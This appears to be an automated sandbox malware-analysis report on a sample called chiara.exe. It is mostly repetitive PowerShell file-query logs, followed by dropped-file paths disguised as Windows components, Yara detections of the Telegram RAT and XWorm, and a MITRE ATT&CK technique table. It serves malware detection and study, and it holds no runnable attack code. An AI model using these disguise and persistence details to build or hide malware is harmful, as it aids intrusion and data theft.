Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Logon Application.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Logon Application.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Logon Application.exe VolumeInformation

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCB0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,SleepEx,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

2_2_00007FF6CCCB0754

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCC94EB0 GetVersionExW,

2_2_00007FF6CCC94EB0

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 11.2.shost.exe.477b518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.475185a.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46aa52a.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46fdeda.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46d420a.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.InstallUtil.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.477b518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46fdeda.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46aa52a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.475185a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46d420a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 11.2.shost.exe.477b518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.475185a.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46aa52a.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46fdeda.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46d420a.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.InstallUtil.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.477b518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46fdeda.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46aa52a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.475185a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46d420a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
